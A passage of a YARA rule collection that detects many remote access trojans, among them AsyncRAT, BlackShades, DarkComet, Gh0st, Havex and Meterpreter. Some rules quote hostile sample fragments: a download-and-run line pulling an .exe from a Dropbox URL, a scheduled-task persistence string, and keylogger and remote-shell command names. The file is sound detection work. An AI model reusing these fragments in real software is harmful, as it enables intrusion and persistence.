    $sa_1 = "META-INF/MANIFEST.MF"
    $sa_2 = "Main.classPK"
    $sa_3 = "plugins/Server.classPK"
    $sa_4 = "IDPK"
    $sb_1 = "config.iniPK"
    $sb_2 = "password.iniPK"
    $sb_3 = "plugins/Server.classPK"
    $sb_4 = "LoadStub.classPK"
    $sb_5 = "LoadStubDecrypted.classPK"
    $sb_7 = "LoadPassword.classPK"
    $sb_8 = "DecryptStub.classPK"
    $sb_9 = "ClassLoaders.classPK"
    $sc_1 = "config.xml"
    $sc_2 = "options"
    $sc_3 = "plugins"
    $sc_4 = "util"
    $sc_5 = "util/OSHelper"
    $sc_6 = "Start.class"
    $sc_7 = "AlienSpy"
    $sc_8 = "PK"
  condition:
    uint16(0) == 19280 and filesize < 819200 and ((all of ($sa_*)) or (all of ($sb_*)) or (all of ($sc_*)))
}

rule Adzok : binary RAT Adzok {
  meta:
    author = " Kevin Breen <kevin@techanarchy.net>"
    Description = "Adzok Rat"
    Versions = "Free 1.0.0.3,"
    date = "2015/05"
    ref = "http://malwareconfig.com/stats/Adzok"
    maltype = "Remote Access Trojan"
    filetype = "jar"
  strings:
    $a1 = "config.xmlPK"
    $a2 = "key.classPK"
    $a3 = "svd$1.classPK"
    $a4 = "svd$2.classPK"
    $a5 = "Mensaje.classPK"
    $a6 = "inic$ShutdownHook.class"
    $a7 = "Uninstall.jarPK"
    $a8 = "resources/icono.pngPK"
  condition:
    7 of ($a*)
}

rule win_asyncrat_j1 {
  meta:
    author = "Johannes Bader @viql"
    date = "2020-04-26"
    description = "detects AsyncRAT"
    references = "https://github.com/NYAN-x-CAT/AsyncRAT-C-Sharp"
    tlp = "white"
  strings:
    $str_anti_1 = "VIRTUAL" wide
    $str_anti_2 = "vmware" wide
    $str_anti_3 = "VirtualBox" wide
    $str_anti_4 = "SbieDll.dll" wide
    $str_miner_1 = "--donate-level=" wide
    $str_b_rev_run = "\\nuR\\noisreVtnerruC\\swodniW\\tfosorciM\\erawtfoS" wide
    $str_b_msg_pack_1 = "(ext8,ext16,ex32) type $c7,$c8,$c9" wide
    $str_b_msg_pack_2 = "(never used) type $c1" wide
    $str_b_schtask_1 = "/create /f /sc ONLOGON /RL HIGHEST /tn \"'" wide
    $str_b_schtask_2 = "\"' /tr \"'" wide
    $str_config_1 = "Antivirus" wide
    $str_config_2 = "Pastebin" wide
    $str_config_3 = "HWID" wide
    $str_config_4 = "Installed" wide
    $str_config_5 = "Pong" wide
    $str_config_6 = "Performance" wide
  condition:
    all of ($str_anti_*) and 4 of ($str_config_*) and (all of ($str_miner_*) or 3 of ($str_b_*))
}

rule BlackShades_3 : Trojan RAT {
  meta:
    description = "BlackShades RAT"
    author = "botherder https://github.com/botherder"
  strings:
    $mod1 = /(m)odAPI/
    $mod2 = /(m)odAudio/
    $mod3 = /(m)odBtKiller/
    $mod4 = /(m)odCrypt/
    $mod5 = /(m)odFuctions/
    $mod6 = /(m)odHijack/
    $mod7 = /(m)odICallBack/
    $mod8 = /(m)odIInet/
    $mod9 = /(m)odInfect/
    $mod10 = /(m)odInjPE/
    $mod11 = /(m)odLaunchWeb/
    $mod12 = /(m)odOS/
    $mod13 = /(m)odPWs/
    $mod14 = /(m)odRegistry/
    $mod15 = /(m)odScreencap/
    $mod16 = /(m)odSniff/
    $mod17 = /(m)odSocketMaster/
    $mod18 = /(m)odSpread/
    $mod19 = /(m)odSqueezer/
    $mod20 = /(m)odSS/
    $mod21 = /(m)odTorrentSeed/
    $tmr1 = /(t)mrAlarms/
    $tmr2 = /(t)mrAlive/
    $tmr3 = /(t)mrAnslut/
    $tmr4 = /(t)mrAudio/
    $tmr5 = /(t)mrBlink/
    $tmr6 = /(t)mrCheck/
    $tmr7 = /(t)mrCountdown/
    $tmr8 = /(t)mrCrazy/
    $tmr9 = /(t)mrDOS/
    $tmr10 = /(t)mrDoWork/
    $tmr11 = /(t)mrFocus/
    $tmr12 = /(t)mrGrabber/
    $tmr13 = /(t)mrInaktivitet/
    $tmr14 = /(t)mrInfoTO/
    $tmr15 = /(t)mrIntervalUpdate/
    $tmr16 = /(t)mrLiveLogger/
    $tmr17 = /(t)mrPersistant/
    $tmr18 = /(t)mrScreenshot/
    $tmr19 = /(t)mrSpara/
    $tmr20 = /(t)mrSprid/
    $tmr21 = /(t)mrTCP/
    $tmr22 = /(t)mrUDP/
    $tmr23 = /(t)mrWebHide/
  condition:
    10 of ($mod*) or 10 of ($tmr*)
}

rule BlackShades2 : Trojan RAT {
  meta:
    author = "Kevin Falcoz"
    date = "26/06/2013"
    description = "BlackShades Server"
  strings:
    $signature1 = { 62 73 73 5F 73 65 72 76 65 72 }
    $signature2 = { 43 4C 49 43 4B 5F 44 45 4C 41 59 00 53 43 4B 5F 49 44 }
    $signature3 = { 6D 6F 64 49 6E 6A 50 45 }
  condition:
    $signature1 and $signature2 and $signature3
}

rule BlackShades_4 : rat {
  meta:
    description = "BlackShades"
    author = "Jean-Philippe Teissier / @Jipe_"
    date = "2013-01-12"
    filetype = "memory"
    version = "1.0"
  strings:
    $a = { 42 00 6C 00 61 00 63 00 6B 00 73 00 68 00 61 00 64 00 65 00 73 }
    $b = { 36 00 3C 00 32 00 20 00 32 00 32 00 26 00 31 00 39 00 3E 00 1D 00 17 00 17 00 1C 00 07 00 1B 00 03 00 07 00 28 00 23 00 0C 00 1D 00 10 00 1B 00 12 00 00 00 28 00 37 00 10 00 01 00 06 00 11 00 0B 00 07 00 22 00 11 00 17 00 00 00 1D 00 1B 00 0B 00 2F 00 26 00 01 00 0B }
    $c = { 62 73 73 5F 73 65 72 76 65 72 }
    $d = { 43 4C 49 43 4B 5F 44 45 4C 41 59 00 53 43 4B 5F 49 44 }
    $e = { 6D 6F 64 49 6E 6A 50 45 }
    $apikey = "f45e373429c0def355ed9feff30eff9ca21eec0fafa1e960bea6068f34209439"
  condition:
    any of ($a, $b, $c, $d, $e) or $apikey
}

rule BlackShades : Trojan {
  meta:
    author = "Kevin Falcoz"
    date = "26/06/2013"
    description = "BlackShades Server"
  strings:
    $signature1 = { 62 73 73 5F 73 65 72 76 65 72 }
    $signature2 = { 43 4C 49 43 4B 5F 44 45 4C 41 59 00 53 43 4B 5F 49 44 }
    $signature3 = { 6D 6F 64 49 6E 6A 50 45 }
  condition:
    $signature1 and $signature2 and $signature3
}

rule BlackShades_25052015 {
  meta:
    author = "Brian Wallace (@botnet_hunter)"
    date = "2014/04"
    ref = "http://malwareconfig.com/stats/PoisonIvy"
    ref = "http://blog.cylance.com/a-study-in-bots-blackshades-net"
    family = "blackshades"
  strings:
    $string1 = "bss_server"
    $string2 = "txtChat"
    $string3 = "UDPFlood"
  condition:
    all of them
}

rule Bolonyokte : rat {
  meta:
    description = "UnknownDotNet RAT - Bolonyokte"
    author = "Jean-Philippe Teissier / @Jipe_"
    date = "2013-02-01"
    filetype = "memory"
    version = "1.0"
  strings:
    $campaign1 = "Bolonyokte" ascii wide
    $campaign2 = "donadoni" ascii wide
    $decoy1 = "nyse.com" ascii wide
    $decoy2 = "NYSEArca_Listing_Fees.pdf" ascii wide
    $decoy3 = "bf13-5d45cb40" ascii wide
    $artifact1 = "Backup.zip" ascii wide
    $artifact2 = "updates.txt" ascii wide
    $artifact3 = "vdirs.dat" ascii wide
    $artifact4 = "default.dat"
    $artifact5 = "index.html"
    $artifact6 = "mime.dat"
    $func1 = "FtpUrl"
    $func2 = "ScreenCapture"
    $func3 = "CaptureMouse"
    $func4 = "UploadFile"
    $ebanking1 = "Internet Banking" wide
    $ebanking2 = "(Online Banking)|(Online banking)"
    $ebanking3 = "(e-banking)|(e-Banking)" nocase
    $ebanking4 = "login"
    $ebanking5 = "en ligne" wide
    $ebanking6 = "bancaires" wide
    $ebanking7 = "(eBanking)|(Ebanking)" wide
    $ebanking8 = "Anmeldung" wide
    $ebanking9 = "internet banking" wide nocase
    $ebanking10 = "Banking Online" wide nocase
    $ebanking11 = "Web Banking" wide
    $ebanking12 = "Power"
  condition:
    any of ($campaign*) or 2 of ($decoy*) or 2 of ($artifact*) or all of ($func*) or 3 of ($ebanking*)
}

rule Bozok : RAT {
  meta:
    author = " Kevin Breen <kevin@techanarchy.net>"
    date = "2014/04"
    ref = "http://malwareconfig.com/stats/Bozok"
    maltype = "Remote Access Trojan"
    filetype = "exe"
  strings:
    $a = "getVer" nocase
    $b = "StartVNC" nocase
    $c = "SendCamList" nocase
    $d = "untPlugin" nocase
    $e = "gethostbyname" nocase
  condition:
    all of them
}

rule Cerberus : RAT memory {
  meta:
    description = "Cerberus"
    author = "Jean-Philippe Teissier / @Jipe_"
    date = "2013-01-12"
    filetype = "memory"
    version = "1.0"
  strings:
    $checkin = "Ypmw1Syv023QZD"
    $clientpong = "wZ2pla"
    $serverping = "wBmpf3Pb7RJe"
    $generic = "cerberus" nocase
  condition:
    any of them
}

rule Crimson : RAT {
  meta:
    author = " Kevin Breen <kevin@techanarchy.net>"
    Description = "Crimson Rat"
    date = "2015/05"
    ref = "http://malwareconfig.com/stats/Crimson"
    maltype = "Remote Access Trojan"
    filetype = "jar"
  strings:
    $a1 = "com/crimson/PK"
    $a2 = "com/crimson/bootstrapJar/PK"
    $a3 = "com/crimson/permaJarMulti/PermaJarReporter$1.classPK"
    $a4 = "com/crimson/universal/containers/KeyloggerLog.classPK"
    $a5 = "com/crimson/universal/UploadTransfer.classPK"
  condition:
    all of ($a*)
}

rule CrossRAT : RAT {
  meta:
    description = "Detects CrossRAT known hash"
    author = "Simon Sigre (simon.sigre@gmail.com)"
    date = "26/01/2018"
    ref = "https://simonsigre.com"
    ref = "https://objective-see.com/blog/blog_0x28.html"
  strings:
    $magic = { 50 4B 03 04 ( 14 | 0A ) 00 }
    $string_1 = "META-INF/"
    $string_2 = ".class" nocase
  condition:
    filesize < 409600 and $magic at 0 and 1 of ($string_*) and hash.md5(0, filesize) == "85b794e080d83a91e904b97769e1e770"
}

rule CyberGate : RAT {
  meta:
    author = " Kevin Breen <kevin@techanarchy.net>"
    date = "2014/04"
    ref = "http://malwareconfig.com/stats/CyberGate"
    maltype = "Remote Access Trojan"
    filetype = "exe"
  strings:
    $string1 = { 23 23 23 23 40 23 23 23 23 E8 EE E9 F9 23 23 23 23 40 23 23 23 23 }
    $string2 = { 23 23 23 23 40 23 23 23 23 FA FD F0 EF F9 23 23 23 23 40 23 23 23 23 }
    $string3 = "EditSvr"
    $string4 = "TLoader"
    $string5 = "Stroks"
    $string6 = "####@####"
    $res1 = "XX-XX-XX-XX"
    $res2 = "CG-CG-CG-CG"
  condition:
    all of ($string*) and any of ($res*)
}

rule DarkComet_1 : RAT {
  meta:
    description = "DarkComet RAT"
    author = "botherder https://github.com/botherder"
  strings:
    $bot1 = /(#)BOT#OpenUrl/ ascii wide
    $bot2 = /(#)BOT#Ping/ ascii wide
    $bot3 = /(#)BOT#RunPrompt/ ascii wide
    $bot4 = /(#)BOT#SvrUninstall/ ascii wide
    $bot5 = /(#)BOT#URLDownload/ ascii wide
    $bot6 = /(#)BOT#URLUpdate/ ascii wide
    $bot7 = /(#)BOT#VisitUrl/ ascii wide
    $bot8 = /(#)BOT#CloseServer/ ascii wide
    $ddos1 = /(D)DOSHTTPFLOOD/ ascii wide
    $ddos2 = /(D)DOSSYNFLOOD/ ascii wide
    $ddos3 = /(D)DOSUDPFLOOD/ ascii wide
    $keylogger1 = /(A)ctiveOnlineKeylogger/ ascii wide
    $keylogger2 = /(U)nActiveOnlineKeylogger/ ascii wide
    $keylogger3 = /(A)ctiveOfflineKeylogger/ ascii wide
    $keylogger4 = /(U)nActiveOfflineKeylogger/ ascii wide
    $shell1 = /(A)CTIVEREMOTESHELL/ ascii wide
    $shell2 = /(S)UBMREMOTESHELL/ ascii wide
    $shell3 = /(K)ILLREMOTESHELL/ ascii wide
  condition:
    4 of ($bot*) or all of ($ddos*) or all of ($keylogger*) or all of ($shell*)
}

rule DarkComet_2 : rat {
  meta:
    description = "DarkComet"
    author = "Jean-Philippe Teissier / @Jipe_"
    date = "2013-01-12"
    filetype = "memory"
    version = "1.0"
  strings:
    $a = "#BEGIN DARKCOMET DATA --"
    $b = "#EOF DARKCOMET DATA --"
    $c = "DC_MUTEX-"
    $k1 = "#KCMDDC5#-890"
    $k2 = "#KCMDDC51#-890"
  condition:
    any of them
}

rule DarkComet_3 : RAT {
  meta:
    author = " Kevin Breen <kevin@techanarchy.net>"
    date = "2014/04"
    ref = "http://malwareconfig.com/stats/DarkComet"
    maltype = "Remote Access Trojan"
    filetype = "exe"
  strings:
    $a1 = "#BOT#URLUpdate"
    $a2 = "Command successfully executed!"
    $a3 = "MUTEXNAME" wide
    $a4 = "NETDATA" wide
    $b1 = "FastMM Borland Edition"
    $b2 = "%s, ClassID: %s"
    $b3 = "I wasn't able to open the hosts file"
    $b4 = "#BOT#VisitUrl"
    $b5 = "#KCMDDC"
  condition:
    all of ($a*) or all of ($b*)
}

rule DarkComet_Keylogger_File : RAT {
  meta:
    author = "Florian Roth"
    description = "Looks like a keylogger file created by DarkComet Malware"
    date = "25.07.14"
    reference = "https://raw.githubusercontent.com/Neo23x0/Loki/master/signatures/thor-hacktools.yar"
    score = 50
  strings:
    $magic = "::"
    $entry = /\n:: [A-Z]/
    $timestamp = /\([0-9]?[0-9]:[0-9][0-9]:[0-9][0-9] [AP]M\)/
  condition:
    ($magic at 0) and #entry > 10 and #timestamp > 10
}

rule DarkComet_4 : RAT {
  meta:
    reference = "https://github.com/bwall/bamfdetect/blob/master/BAMF_Detect/modules/yara/darkcomet.yara"
  strings:
    $a1 = "#BOT#"
    $a2 = "WEBCAMSTOP"
    $a3 = "UnActiveOnlineKeyStrokes"
    $a4 = "#SendTaskMgr"
    $a5 = "#RemoteScreenSize"
    $a6 = "ping 127.0.0.1 -n 4 > NUL &&"
  condition:
    all of them
}

rule DarkComet_5 {
  meta:
    maltype = "DarkComet RAT"
    author = "https://github.com/reed1713"
    description = "Malware creates the MSDCSC directory, which is a common path utilized by DarkComet, as well as the mutex pattern."
  strings:
    $type = "Microsoft-Windows-Security-Auditing"
    $eventid = "4688"
    $data = /AppData\\Local\\Temp\\MSDCSC\\.+\.exe/
    $type1 = "Microsoft-Windows-Security-Auditing"
    $eventid1 = "4674"
    $data1 = /DC_MUTEX-[0-9A-Z]{7}/
  condition:
    ($type and $eventid and $data) or ($type1 and $eventid1 and $data1)
}

rule FlyingKitten : rat {
  meta:
    Author = "CrowdStrike, Inc"
    Date = "2014/05/13"
    Description = "Flying Kitten RAT"
    Reference = "http://blog.crowdstrike.com/cat-scratch-fever-crowdstrike-tracks-newly-reported-iranian-actor-flying-kitten"
  strings:
    $classpath = "Stealer.Properties.Resources.resources"
    $pdbstr = "\\Stealer\\obj\\x86\\Release\\Stealer.pdb"
  condition:
    all of them and uint16(0) == 23117 and uint32(uint32(60)) == 17744 and uint16(uint32(60) + 22) & 8192 == 0 and ((uint16(uint32(60) + 24) == 267 and uint32(uint32(60) + 232) > 0) or (uint16(uint32(60) + 24) == 523 and uint32(uint32(60) + 248) > 0))
}

rule CSIT_14003_03 : installer RAT {
  meta:
    Author = "CrowdStrike, Inc"
    Date = "2014/05/13"
    Description = "Flying Kitten Installer"
    Reference = "http://blog.crowdstrike.com/cat-scratch-fever-crowdstrike-tracks-newly-reported-iranian-actor-flying-kitten"
  strings:
    $exename = "IntelRapidStart.exe"
    $confname = "IntelRapidStart.exe.config"
    $cabhdr = { 4D 53 43 46 00 00 00 00 }
  condition:
    all of them
}

rule APT_WIN_Gh0st_ver : RAT {
  meta:
    author = "@BryanNolen"
    date = "2012-12"
    type = "APT"
    version = "1.1"
    ref = "Detection of Gh0st RAT server DLL component"
    ref1 = "http://www.mcafee.com/au/resources/white-papers/foundstone/wp-know-your-digital-enemy.pdf"
  strings:
    $library = "deflate 1.1.4 Copyright 1995-2002 Jean-loup Gailly"
    $capability = "GetClipboardData"
    $capability1 = "capCreateCaptureWindowA"
    $capability2 = "CreateRemoteThread"
    $capability3 = "WriteProcessMemory"
    $capability4 = "LsaRetrievePrivateData"
    $capability5 = "AdjustTokenPrivileges"
    $function = "ResetSSDT"
    $window = "WinSta0\\Default"
    $magic = { 47 6C 6F 62 61 6C 5C [5-9] 20 25 64 }
  condition:
    all of them
}

rule Gh0st : RAT {
  meta:
    description = "Gh0st"
    author = "botherder https://github.com/botherder"
  strings:
    $ = /(G)host/
    $ = /(i)nflate 1\.1\.4 Copyright 1995-2002 Mark Adler/
    $ = /(d)eflate 1\.1\.4 Copyright 1995-2002 Jean-loup Gailly/
    $ = /(%)s\\shell\\open\\command/
    $ = /(G)etClipboardData/
    $ = /(W)riteProcessMemory/
    $ = /(A)djustTokenPrivileges/
    $ = /(W)inSta0\\Default/
    $ = /(#)32770/
    $ = /(#)32771/
    $ = /(#)32772/
    $ = /(#)32774/
  condition:
    all of them
}

rule gh0st {
  meta:
    author = "https://github.com/jackcr/"
  strings:
    $a = { 47 68 30 73 74 ?? ?? ?? ?? ?? ?? ?? ?? 78 9C }
    $b = "Gh0st Update"
  condition:
    any of them
}

rule gholeeV1 {
  meta:
    Author = "@GelosSnake"
    Date = "2014/08"
    Description = "Gholee first discovered variant "
    Reference = "http://securityaffairs.co/wordpress/28170/cyber-crime/gholee-malware.html"
  strings:
    $a = "sandbox_avg10_vc9_SP1_2011"
    $b = "gholee"
  condition:
    all of them
}

rule gholeeV2 {
  meta:
    Author = "@GelosSnake"
    Date = "2015-02-12"
    Description = "Gholee first discovered variant "
    Reference = "http://securityaffairs.co/wordpress/28170/cyber-crime/gholee-malware.html"
  strings:
    $string0 = "RichHa"
    $string1 = "         (((((                  H" wide
    $string2 = "1$1,141<1D1L1T1\\1d1l1t1"
    $string3 = "<8;$O' "
    $string4 = "@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]"
    $string5 = "jYPQTVTSkllZTTXRTUiHceWda/"
    $string6 = "urn:schemas-microsoft-com:asm.v1"
    $string7 = "8.848H8O8i8s8y8"
    $string8 = "wrapper3" wide
    $string9 = "pwwwwwwww"
    $string10 = "Sunday"
    $string11 = "YYuTVWh"
    $string12 = "DDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDIN"
    $string13 = "ytMMMMMMUbbrrrrrxxxxxxxxrriUMMMMMMMMMUuzt"
    $string15 = "wrapper3 Version 1.0" wide
    $string16 = "77A779"
    $string17 = "<C<G<M<R<X<"
    $string18 = "9 9-9N9X9s9"
  condition:
    18 of them
}

rule MW_gholee_v1 : v1 {
  meta:
    Author = "@GelosSnake"
    description = "http://securityaffairs.co/wordpress/28170/cyber-crime/gholee-malware.html"
    date = "2014-08"
    maltype = "Remote Access Trojan"
    sample_filetype = "dll"
    hash0 = "48573a150562c57742230583456b4c02"
  strings:
    $a = "sandbox_avg10_vc9_SP1_2011"
    $b = "gholee"
  condition:
    all of them
}

rule MW_gholee_v2 : v2 {
  meta:
    author = "@GelosSnake"
    date = "2015-02-12"
    description = "http://securityaffairs.co/wordpress/28170/cyber-crime/gholee-malware.html"
    hash0 = "05523761ca296ec09afdf79477e5f18d"
    hash1 = "08e424ac42e6efa361eccefdf3c13b21"
    hash2 = "5730f925145f1a1cd8380197e01d9e06"
    hash3 = "73461c8578dd9ab86d42984f30c04610"
    sample_filetype = "dll"
  strings:
    $string0 = "RichHa"
    $string1 = "         (((((                  H" wide
    $string2 = "1$1,141<1D1L1T1\\1d1l1t1"
    $string3 = "<8;$O' "
    $string4 = "@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]"
    $string5 = "jYPQTVTSkllZTTXRTUiHceWda/"
    $string6 = "urn:schemas-microsoft-com:asm.v1"
    $string7 = "8.848H8O8i8s8y8"
    $string8 = "wrapper3" wide
    $string9 = "pwwwwwwww"
    $string10 = "Sunday"
    $string11 = "YYuTVWh"
    $string12 = "DDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDIN"
    $string13 = "ytMMMMMMUbbrrrrrxxxxxxxxrriUMMMMMMMMMUuzt"
    $string15 = "wrapper3 Version 1.0" wide
    $string16 = "77A779"
    $string17 = "<C<G<M<R<X<"
    $string18 = "9 9-9N9X9s9"
  condition:
    18 of them
}

rule glassrat : RAT {
  meta:
    author = "Brian Wallace @botnet_hunter"
  strings:
    $a = "PostQuitMessage"
    $b = "pwlfnn10,gzg"
    $c = "update.dll"
    $d = "_winver"
  condition:
    all of them
}

rule Win32OPCHavex {
  meta:
    Author = "BAE Systems"
    Date = "2014/06/23"
    Description = "Rule for identifying OPC version of HAVEX"
    Reference = "www.f-secure.com/weblog/archives/00002718.html"
  strings:
    $mzhdr = "MZ"
    $dll = "7CFC52CD3F87.dll"
    $a1 = "Start finging of LAN hosts..." wide
    $a2 = "Finding was fault. Unexpective error" wide
    $a3 = "Was found %i hosts in LAN:" wide
    $a4 = "Hosts was't found." wide
    $a5 = "Start finging of OPC Servers..." wide
    $a6 = "Was found %i OPC Servers." wide
    $a7 = "OPC Servers not found. Programm finished" wide
    $a8 = "%s[%s]!!!EXEPTION %i!!!" wide
    $a9 = "Start finging of OPC Tags..." wide
  condition:
    $mzhdr at 0 and ($dll or (any of ($a*)))
}

rule Win32FertgerHavex {
  meta:
    Author = "BAE Systems"
    Date = "2014/06/23"
    Description = "Rule for identifying Fertger version of HAVEX"
    Reference = "www.f-secure.com/weblog/archives/00002718.html"
  strings:
    $mz = "MZ"
    $a1 = "\\\\.\\pipe\\mypipe-f" wide
    $a2 = "\\\\.\\pipe\\mypipe-h" wide
    $a3 = "\\qln.dbx" wide
    $a4 = "*.yls" wide
    $a5 = "\\*.xmd" wide
    $a6 = "fertger" wide
    $a7 = "havex"
  condition:
    $mz at 0 and 3 of ($a*)
}

rule Havex_Trojan_PHP_Server {
  meta:
    Author = "Florian Roth"
    Date = "2014/06/24"
    Description = "Detects the PHP server component of the Havex RAT"
    Reference = "www.f-secure.com/weblog/archives/00002718.html"
  strings:
    $s1 = "havex--></body></head>"
    $s2 = "ANSWERTAG_START"
    $s3 = "PATH_BLOCKFILE"
  condition:
    all of them
}

rule SANS_ICS_Cybersecurity_Challenge_400_Havex_Memdump : memory {
  meta:
    description = "Detects Havex Windows process executable from memory dump"
    date = "2015-12-2"
    author = "Chris Sistrunk"
    hash = "8065674de8d79d1c0e7b3baf81246e7d"
  strings:
    $magic = { 4D 5A }
    $s1 = "~tracedscn.yls" wide fullword
    $s2 = "[!]Start" wide fullword
    $s3 = "[+]Get WSADATA" wide fullword
    $s4 = "[-]Can not get local ip" wide fullword
    $s5 = "[+]Local:" wide fullword
    $s6 = "[-]Threads number > Hosts number" wide fullword
    $s7 = "[-]Connection error" wide fullword
    $x1 = "bddd4e2b84fa2ad61eb065e7797270ff.exe" wide fullword
  condition:
    $magic at 0 and (3 of ($s*) or $x1)
}

rule apt_win32_dll_rat_hiZor_RAT : RAT {
  meta:
    description = "Detects hiZor RAT"
    hash1 = "75d3d1f23628122a64a2f1b7ef33f5cf"
    hash2 = "d9821468315ccd3b9ea03161566ef18e"
    hash3 = "b9af5f5fd434a65d7aa1b55f5441c90a"
    ref1 = "http://www.threatgeek.com/2016/01/introducing-hi-zor-rat.html"
    ref2 = "https://github.com/Neo23x0/Loki/blob/b187ed063d73d0defc6958100ca7ad04aa77fc12/signatures/apt_hizor_rat.yar"
    reference = "https://www.fidelissecurity.com/sites/default/files/FTA_1020_Fidelis_Inocnation_FINAL.pdf"
  strings:
    $s1 = { C7 [5] 40 00 62 00 C7 [5] 77 00 64 00 C7 [5] 61 00 61 00 C7 [5] 6C 00 }
    $s2 = { 66 [7] 0D 40 83 ?? ?? 7C ?? }
    $s3 = { 80 [2] 2E 40 3B ?? 72 ?? }
    $s4 = "CmdProcessExited" ascii wide
    $s5 = "rootDir" ascii wide
    $s6 = "DllRegisterServer" ascii wide
    $s7 = "GetNativeSystemInfo" ascii wide
    $s8 = "%08x%08x%08x%08x" ascii wide
  condition:
    (uint16(0) == 23117 or uint32(0) == 18359272831) and (all of them)
}

rule Indetectables_RAT : RAT {
  meta:
    description = "Detects Indetectables RAT based on strings found in research by Paul Rascagneres & Ronan Mouchoux"
    author = "Florian Roth"
    reference = "http://www.sekoia.fr/blog/when-a-brazilian-string-smells-bad/"
    date = "2015-10-01"
    super_rule = 1
    hash1 = "081905074c19d5e32fd41a24b4c512d8fd9d2c3a8b7382009e3ab920728c7105"
    hash2 = "66306c2a55a3c17b350afaba76db7e91bfc835c0e90a42aa4cf59e4179b80229"
    hash3 = "1fa810018f6dd169e46a62a4f77ae076f93a853bfc33c7cf96266772535f6801"
  strings:
    $s1 = "Coded By M3" wide fullword
    $s2 = "Stub Undetector M3" wide fullword
    $s3 = "www.webmenegatti.com.br" wide
    $s4 = "M3n3gatt1" wide fullword
    $s5 = "TheMisterFUD" wide fullword
    $s6 = "KillZoneKillZoneKill" ascii fullword
    $s7 = "[[__M3_F_U_D_M3__]]$" ascii fullword
    $s8 = "M3_F_U_D_M3" ascii
    $s9 = "M3n3gatt1hack3r" wide fullword
    $s9a = "M3n3gatt1hack3r" ascii fullword
  condition:
    uint16(0) == 23117 and filesize < 5120000 and 1 of them
}

rule BergSilva_Malware : RAT {
  meta:
    description = "Detects a malware from the same author as the Indetectables RAT"
    author = "Florian Roth"
    date = "2015-10-01"
    super_rule = 1
    hash1 = "00e175cbad629ee118d01c49c11f3d8b8840350d2dd6d16bd81e47ae926f641e"
    hash2 = "6b4cbbee296e4a0e867302f783d25d276b888b1bf1dcab9170e205d276c22cfc"
  strings:
    $x1 = "C:\\Users\\Berg Silva\\Desktop\\" wide
    $x2 = "URLDownloadToFileA 0, \"https://dl.dropbox.com/u/105015858/nome.exe\", \"c:\\nome.exe\", 0, 0" wide fullword
    $s1 = " Process.Start (Path.GetTempPath() & \"name\" & \".exe\") 'start server baixado" wide fullword
    $s2 = "FileDelete(@TempDir & \"\\nome.exe\") ;Deleta o Arquivo para que possa ser executado normalmente" wide fullword
    $s3 = " Lib \"\\WINDOWS\\system32\\UsEr32.dLl\"" wide fullword
    $s4 = "$Directory = @TempDir & \"\\nome.exe\" ;Define a variavel" wide fullword
    $s5 = "https://dl.dropbox.com/u/105015858" wide
  condition:
    uint16(0) == 23117 and (1 of ($x*) or 2 of ($s*))
}

rule apt_win32_dll_rat_1a53b0cp32e46g0qio7 {
  meta:
    author = "https://www.fidelissecurity.com/"
    info = "Indicators for FTA-1020"
    hash1 = "75d3d1f23628122a64a2f1b7ef33f5cf"
    hash2 = "d9821468315ccd3b9ea03161566ef18e"
    hash3 = "b9af5f5fd434a65d7aa1b55f5441c90a"
    reference = "https://github.com/fideliscyber"
  strings:
    $ = { C7 [2] 64 00 63 00 C7 [2] 69 00 62 00 C7 [2] 7A 00 7E 00 C7 [2] 2D 00 43 00 C7 [2] 59 00 2D 00 C7 [2] 3B 00 23 00 C7 [2] 3E 00 36 00 C7 [2] 2D 00 5A 00 C7 [2] 42 00 5A 00 C7 [2] 3B 00 39 00 C7 [2] 36 00 2D 00 C7 [2] 59 00 7F 00 C7 [2] 64 00 69 00 C7 [2] 68 00 63 00 C7 [2] 79 00 22 00 C7 [2] 3A 00 23 00 C7 [2] 3D 00 36 00 C7 [2] 2D 00 7F 00 C7 [2] 7B 00 37 00 C7 [2] 3C 00 3C 00 C7 [2] 23 00 3D 00 C7 [2] 24 00 2D 00 C7 [2] 61 00 64 00 C7 [2] 66 00 68 00 C7 [2] 2D 00 4A 00 C7 [2] 68 00 6E 00 C7 [2] 66 00 62 00 }
    $ = { C7 [2] 23 00 24 00 C7 [2] 24 00 33 00 C7 [2] 38 00 22 00 C7 [2] 00 00 33 00 C7 [2] 24 00 25 00 C7 [2] 3F 00 39 00 C7 [2] 38 00 0A 00 C7 [2] 04 00 23 00 C7 [2] 38 00 00 00 C7 [2] 43 00 66 00 C7 [2] 6D 00 60 00 C7 [2] 67 00 52 00 C7 [2] 6E 00 63 00 C7 [2] 7B 00 67 00 C7 [2] 70 00 00 00 C7 [2] 43 00 4D 00 C7 [2] 44 00 00 00 C7 [2] 0F 00 43 00 C7 [2] 00 00 50 00 C7 [2] 49 00 4E 00 C7 [2] 47 00 00 00 C7 [2] 11 00 12 00 C7 [2] 17 00 0E 00 C7 [2] 10 00 0E 00 C7 [2] 10 00 0E 00 C7 [2] 11 00 06 00 C7 [2] 44 00 45 00 C7 [2] 4C 00 00 00 }
    $ = { 66 [4-7] 0D 40 83 F8 44 7C ?? }
    $ = { 66 [4-7] 14 40 83 F8 14 7C ?? }
    $ = { 66 [4-7] 56 40 83 F8 2D 7C ?? }
    $ = { 66 [4-7] 20 40 83 F8 1A 7C ?? }
    $ = { 80 [2-7] 2E 40 3D 50 02 00 00 72 ?? }
    $ = "%08x%08x%08x%08x" ascii wide
    $ = "WinHttpGetIEProxyConfigForCurrentUser" ascii wide
  condition:
    (uint16(0) == 23117 or uint32(0) == 18359272831) and (all of them)
}

rule Meterpreter_Reverse_Tcp {
  meta:
    author = "chort (@chort0)"
    description = "Meterpreter reverse TCP backdoor in memory. Tested on Win7x64."
  strings:
    $a = { 4D 45 54 45 52 50 52 45 54 45 52 5F 54 52 41 4E 53 50 4F 52 54 5F 53 53 4C [32-48] 68 74 74 70 73 3A 2F 2F 58 58 58 58 58 58 }
    $b = { 4D 45 54 45 52 50 52 45 54 45 52 5F 55 41 }
    $c = { 47 45 54 20 2F 31 32 33 34 35 36 37 38 39 20 48 54 54 50 2F 31 2E 30 }
    $d = { 6D 65 74 73 72 76 2E 64 6C 6C [2-4] 52 65 66 6C 65 63 74 69 76 65 4C 6F 61 64 65 72 }
  condition:
    $a or (any of ($b, $d) and $c)
